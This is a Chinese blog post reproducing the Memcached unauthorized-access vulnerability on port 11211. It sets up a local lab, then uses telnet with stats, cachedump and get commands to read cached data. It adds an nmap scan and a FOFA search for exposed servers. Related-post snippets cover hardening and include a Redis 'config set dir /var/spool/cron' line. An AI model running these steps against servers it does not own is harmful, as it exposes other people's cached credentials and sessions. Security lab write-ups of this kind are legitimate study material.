Memcached未授权访问漏洞

于 2024-08-04 10:54:54 发布
阅读量72 收藏
点赞数
分类专栏: 未授权访问合集 文章标签: memcached 数据库 缓存
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53736204/article/details/140899871
版权

Memcached未授权访问漏洞

Memcache能够提供临时数据存储服务,可以提高网站的整体性能,但由于memcache安全设计缺陷,默认开放的端口是11211,导致不需要密码就可以访问,攻击者可以直接连接服务器的11211端口获取数据库中的信息,导致信息泄露。

漏洞复现

步骤一:下载Memcached程序并执行以下命令---->启动Memcached漏洞环境

下载地址:
https://www.runoob.com/memcached/window-install-memcached.html
#执行命令
memcached.exe -d install
memcached.exe -d start

步骤二:使用Telnet程序探测目标的11211端口.

#Telnet探测
telnet 192.168.4.199 11211
#操作命令
stats //查看memcache服务状态
stats items //查看所有items
stats cachedump 390//获得缓存key
get:state:264861539228401373:261588//通过key读取相应value获得实际缓存内容,造
成敏感信息泄露

连接成功
在这里插入图片描述

步骤三:用nmap进行漏洞扫描
在这里插入图片描述
实例
用fofa语法 port="11211"搜索
连接成功
在这里插入图片描述

黑白时光les
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Memcached授权访问漏洞记录(CVE-2013-7239、危害级别全版本、端口:11211)
墨痕诉清风的博客
11-13 1949
Memcached介绍 Memcached是一个自由开源的,高性能,分布式内存对象缓存系统。 Memcached是以LiveJournal旗下Danga Interactive公司的Brad Fitzpatric为首开发的一款软件。现在已成为mixi、hatena、Facebook、Vox、LiveJournal等众多服务中提高Web应用扩展性的重要因素。 Memcached是一种基于内存的key-value存储,用来存储小块的任意数据(字符串、对象)。这些数据可以是数据库调用、API调用或者是页面渲
linux memcached授权访问漏洞,Memcache授权访问漏洞利用及修复
weixin_29526539的博客
05-16 1296
(1)缓存数据经过滤直接输出可导致XSS;(2)缓存数据经过滤代入拼接的SQL注入查询语句可导致SQL注入;(3)缓存数据存储敏感信息(如:用户名、密码),可以通过读取操作直接泄漏;(4)缓存数据经过滤直接通过system()、eval()等函数处理可导致命令执行;(5)缓存数据经过滤直接在header()函数中输出,可导致CRLF漏洞(HTTP响应拆分)。… …漏洞利用:漏洞的利用根据所...
授权访问Memcached 授权访问漏洞
qq_68163788的博客
05-11 1209
Memcached是一种高性能的分布式内存对象缓存系统,常用于加速动态Web应用程序。然而,由于其默认配置不安全,存在授权访问漏洞。攻击者可以利用这一漏洞直接访问Memcached服务器,甚至在没有任何身份验证的情况下执行恶意操作。 授权访问Memcached漏洞可能导致多种安全问题,包括数据泄露、DDoS攻击和授权的数据修改。攻击者可以利用该漏洞来获取敏感信息,如用户凭据、会话令牌或其他机密数据,从而对系统造成严重影响。
Memcached 授权访问漏洞验证
gaomei2009的专栏
12-05 4887
Memcached 授权访问漏洞验证
Web 安全:Memcached 授权访问漏洞.(11211端口)
网络安全领域___专研者.
07-29 839
Memcached 是一种常用的 key-value 分布式高速缓存系统,它将数据存储在内存中,以提高应用的访问速度。然而,由于 Memcached 的默认配置,11211 端口不需要密码即可访问,攻击者可以直接连接到 Memcached 服务的 11211 端口获取数据库中的信息,造成严重的信息泄露。
CVE-2013-7239 Memcached授权访问漏洞复现
qq_43264813的博客
06-06 1232
漏洞原理 Memcached是一套分布式高速缓存系统,它以Key -Value的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取,正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由于Memcached 的安全设计缺陷客户端连接Memcached服务器后无需认证就可读取、修改服务器缓存内容。 影响版本 Memcached全版本 漏洞复现 1、在目标机上下载Memcached服务端 apt-get install memcached 2、启动Memcach
Memcache授权访问漏洞修复
lurenyi168的专栏
01-12 973
Memcache授权访问漏洞修复
Memcached 授权访问漏洞 CVE-2013-7239
0nc3的博客
12-18 5427
0x00 漏洞简介 漏洞简述Memcached 是一套分布式高速缓存系统。它以 Key – Value 的形式将数据存储在内存中。这些数据通常是会被频繁地应用、读取的。正因为内存中数据的读取速度远远大于硬盘的读取速度所以可以用来加速应用的访问。由于 Memcached 的安全设计缺陷客户端连接 Memcached 服务器后无需认证就可读取、修改服务器缓存内容。 影响范围:Memcached 全版...
Memcache授权访问漏洞
龙卷风摧毁停车场
03-16 1314
通过访问 Memcache 服务的默认端口 11211 获取敏感信息,或进行授权操作。可使用 Memcache 中 get、set 等命令获取缓存数据,也可通过 Memcache 中 flush_all 命令清除所有缓存数据。
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
memcached加固.pdf
03-15
启用SASL认证可以增加Memcached的安全性,防止授权访问。 - SASL认证的详细配置手册需要参考官方文档或其他技术资料。 ##### 4. 修改默认端口 - **更改监听端口**: - 默认情况下,Memcached监听端口为...
memcache.dll for php5.3 X32
11-04
8. **安全性**:虽然memcached可以提高性能,但也需要注意安全,防止授权访问或攻击。例如,不要暴露memcached服务在公网上,而是应仅在内部网络中使用。 9. **扩展兼容性**:PHP的版本和扩展之间有严格的匹配...
Linux下如何安装配置Memcached缓存服务器
最新发布
小筱在线博客
08-02 219
总结: 通过以上步骤,可以在Linux系统中安装和配置Memcached缓存服务器,并使用相应的Memcached客户端来操作Memcached服务器。在配置Memcached时,可以根据实际需求设置监听的IP地址、端口号、分配的内存大小、最大连接数等参数。在Linux系统下,安装和配置Memcached缓存服务器相对简单,本文将介绍如何在Linux系统中安装和配置Memcached。根据自己选择的编程语言,安装相应的Memcached客户端库,并根据其文档进行使用。
PHP+SSE流推送技术,如果卡页面的话,记得session存储到redis或memcached
大华的程序人生
07-31 186
PHP+SSE流推送技术,如果卡页面的话,记得session存储到redis或memcached
以一个开发者的身份浅谈Memcached
qq_56438516的博客
08-01 952
Memcached是一个高性能的分布式内存缓存系统,广泛用于提高大型动态网站和应用的性能。它通过缓存数据和对象来减少读取外部数据源(比如数据库或API)的次数,从而加快数据检索速度并降低延迟。Memcached使用一个简单的协议来存储和检索数据。它支持基本的存储命令,如setaddreplaceget等,以及删除和更新缓存条目的命令。
Memcached开发(十九):与NoSQL数据库集成
08-01 1183
在现代应用程序开发中,Memcached作为一个高效的内存缓存系统被广泛使用。而NoSQL数据库因其灵活的架构和高性能的特性,也逐渐成为数据存储的主流选择。将Memcached与NoSQL数据库集成,可以充分发挥二者的优势,实现高效的数据缓存与持久化存储,提升系统的整体性能和可扩展性。本文将详细介绍如何将Memcached与NoSQL数据库集成,包括基本概念、常见集成场景、实现步骤和案例。
Memcached授权访问如何解决
05-26
要解决Memcached授权访问问题,可以考虑以下几个方面: 1. 配置访问控制:通过修改Memcached的配置文件(如memcached.conf),设置访问控制,只允许特定的IP地址或者子网范围访问。可以使用以下命令查看配置文件路径: ``` ps aux | grep memcached ``` 2. 配置防火墙:使用防火墙软件(如iptables)限制只有特定的IP地址或者子网范围可以访问Memcached。可以使用以下命令添加防火墙规则: ``` iptables -A INPUT -p tcp --dport 11211 -s <allowed_ip> -j ACCEPT ``` 3. 修改默认端口:Memcached默认监听11211端口,可以修改为其他端口,减少被攻击的可能性。可以使用以下命令修改端口: ``` memcached -p <new_port> ``` 4. 升级到最新版本:如果使用的是较旧的Memcached版本,则建议升级到最新版本,以修复已知的漏洞和安全问题。 需要注意的是,以上措施只能减少Memcached被攻击的可能性,并不能完全保证安全。因此,还需要定期检查和监控Memcached的运行情况,及时发现和处理异常情况。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值